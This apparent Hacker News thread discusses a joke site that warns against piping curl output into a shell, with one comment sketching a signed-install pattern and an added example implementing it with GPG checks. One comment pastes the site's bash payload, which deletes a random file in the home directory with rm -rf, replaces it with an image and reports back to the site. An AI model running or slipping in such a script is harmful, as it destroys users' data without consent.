

Curl-to-shell russian roulette - coconutrandom
http://russianroulette.sh/

======
joshguthrie
You know what? This is perfect.

Some users are gonna go all "no", "this is bad", "no malware on HN" and "you
must be crazy to do it yadda yadda" on you, but in the end it doesn't matter
because you've done it: you've disrupted that little peace of mind they had
about running "curl rvm.io/install | sh".

Now they know that piping a curl command to shell is akin to unprotected sex.
Sure, I'd happily be the first to say "oh come on, we all know RVM, the guy
doesn't have any diseases: he's all clean, there's no risk" and we'd all be
happy to follow with some wishful thinking of "there's a one in a billion
chance something bad happens, no way I'm that unlucky".

But just like russian roulette, one bad time is enough to get in a _LOT_ of
trouble.

Sorry comrades, I'm done compromising my box's security on a daily basis. From
now on, I'll GPG-check your install scripts before piping them blindly to my
personal area :)

Even better: why don't we write a common install pattern for scripts?

Something simple like $ web-install http://your-site.com/

* Attempts to download conf file from http://your-site.com/WEB_INSTALL

* Looks up install script and gpg file path in the conf file

* Downloads install script and gpg file to /tmp and gpg-checks the install script.

* If it all checks out, run the install script.

Or maybe we already have something cool like this but some developers seem to
think these commodities are for neckbeards who swim in gpg keys all day long?

PS: Using RVM as an example there because I only have them in mind but I did
this for npm too in the past and countless others I can't remember, so no hate
intended against them.
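
The pattern sketched above, written out as a working web-install wrapper. This
is an added example, not code from this thread, from RVM, or from any real
installer; the WEB_INSTALL format (KEY=VALUE lines INSTALL_SCRIPT and
INSTALL_SIG), the file:// fetch path used to exercise it offline, and the
function names are all assumptions made for the example. Two details the
bullet list leaves implicit are the ones that decide whether the scheme is
worth anything: the verifying keyring holds only the publisher's key and the
signer's fingerprint is pinned, so a key that wandered into the user's default
keyring cannot vouch for the script, and the bytes that were verified are the
bytes that run, with no second fetch in between.

```sh
#!/bin/sh
# web-install: an added, hypothetical implementation of the install pattern
# proposed in the comment above. Not code from the thread, from RVM, or from
# any real installer. Assumed conventions (invented for this example):
#   <site>/WEB_INSTALL   KEY=VALUE lines: INSTALL_SCRIPT=... and INSTALL_SIG=...
#   INSTALL_SIG          a detached OpenPGP signature over INSTALL_SCRIPT
#   pinned fingerprint   obtained out of band, never from the site that serves
#                        the script
set -eu

# Fetch URL into DEST. Real sites must be https (no downgrade, few redirects);
# file:// is accepted so the flow can be exercised offline without a network.
fetch() {
    local url=$1 dest=$2
    case "$url" in
        file://*)  cp -- "${url#file://}" "$dest" ;;
        https://*) curl --proto '=https' --tlsv1.2 --fail --silent --show-error \
                        --location --max-redirs 3 --output "$dest" "$url" ;;
        *) echo "web-install: refusing non-https URL: $url" >&2; return 1 ;;
    esac
}

# Read KEY from a KEY=VALUE conf file (first match wins, '#' lines ignored).
conf_get() {
    awk -F= -v k="$1" '/^[[:space:]]*#/ { next } $1 == k { sub(/^[^=]*=/, ""); print; exit }' "$2"
}

# Verify SIG over SCRIPT using a keyring that holds ONLY the pinned key, then
# require the signing key's fingerprint to match, so a stray key in the user's
# default keyring cannot vouch for the script.
verify_script() {
    local script=$1 sig=$2 keyring=$3 pinned=$4 status
    status=$(gpg --homedir "$keyring" --batch --status-fd 1 --verify "$sig" "$script") || return 1
    # VALIDSIG's first field is the signing (sub)key, its last the primary key.
    printf '%s\n' "$status" | grep -q -E "^\[GNUPG:\] VALIDSIG ($pinned |.* $pinned\$)"
}

# web_install SITE_URL KEYRING_DIR PINNED_FINGERPRINT
#   1. fetch SITE_URL/WEB_INSTALL          2. read the script and signature paths
#   3. fetch both into a private temp dir  4. verify     5. run the verified bytes
# The verified file and the executed file are the same bytes on disk; never
# re-fetch after verifying, or the server may serve a different script the
# second time.
web_install() {
    local site=$1 keyring=$2 pinned=$3 work rc
    work=$(mktemp -d) || return 2
    rc=0
    web_install_in "$site" "$keyring" "$pinned" "$work" || rc=$?
    rm -rf -- "$work"
    return "$rc"
}

web_install_in() {
    local site=$1 keyring=$2 pinned=$3 work=$4 script sig p
    fetch "$site/WEB_INSTALL" "$work/WEB_INSTALL" || return 2
    script=$(conf_get INSTALL_SCRIPT "$work/WEB_INSTALL")
    sig=$(conf_get INSTALL_SIG "$work/WEB_INSTALL")
    # Both entries must exist and be plain paths under the site: no absolute
    # paths, no '..', no scheme smuggled in to redirect the fetch elsewhere.
    for p in "$script" "$sig"; do
        case "$p" in ''|/*|*..*|*://*)
            echo "web-install: bad or missing path in WEB_INSTALL: '$p'" >&2; return 2 ;;
        esac
    done
    fetch "$site/$script" "$work/install.sh"     || return 2
    fetch "$site/$sig"    "$work/install.sh.sig" || return 2
    if ! verify_script "$work/install.sh" "$work/install.sh.sig" "$keyring" "$pinned"; then
        echo "web-install: signature check FAILED for $site/$script; not running it" >&2
        return 3
    fi
    sh "$work/install.sh"
}

# Usage: web-install https://your-site.com/ ~/.web-install/your-site-keyring <fingerprint>
if [ "$#" -eq 3 ]; then
    web_install "$1" "$2" "$3"
fi
```

What this does not solve is where the fingerprint comes from. If you take it
from the same page that serves the script, whoever can swap the script can
swap the fingerprint too, so it has to arrive by another route (the project's
signed release announcements, a key you already trust, a colleague). The
per-site keyring is created once with gpg --homedir DIR --import on that key
and never touched by anything else.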

~~~
matt__rose
Gee, you mean like RPM, or deb files? Why people keep reinventing these tools,
but much worse, I have no idea.

~~~
joshguthrie
I thought of this, yeah. Which made me wonder: "why do we need to pipe a shell
script to install RVM instead of yum install RVM?".

I don't have an answer and would gladly accept one though I suspect it's
related to difficulties with deploying to multiple release systems (rpm, yum,
deb, apt-get, brew, ports,..).

------
pvnick

      #!/bin/bash
      # bash, not sh: the array and $RANDOM below are bash-only
      (
      files=(~/*)
      f="${files[RANDOM % ${#files[@]}]}"
      rm -rf "$f"
      curl http://placekitten.com/g/320/240 > "$f"
      echo 'bang!' "$f" 'is now a kitten' ) && curl --silent -o /dev/null http://russianroulette.sh/b/QPteR3KS/3/NamelessWonder


cute, but please refrain from pasting malware to HN

~~~
vezzy-fnord
At least you know he's serious about the Russian roulette. It also illustrates
the point, quite directly.

Reminds me of the old Casino DOS virus which copied the FAT to RAM and
proceeded to flush it, but challenged you to a game of slots to retrieve the
data (it was a fluke, your data would be destroyed in all cases).

By the way, the page markup isn't that bad. You're using tables and HTML4
semantics in an HTML5 doctype declaration, but the actual quality is fine.

------
Gurrewe
What about no?

------
Artemis2
Genius!

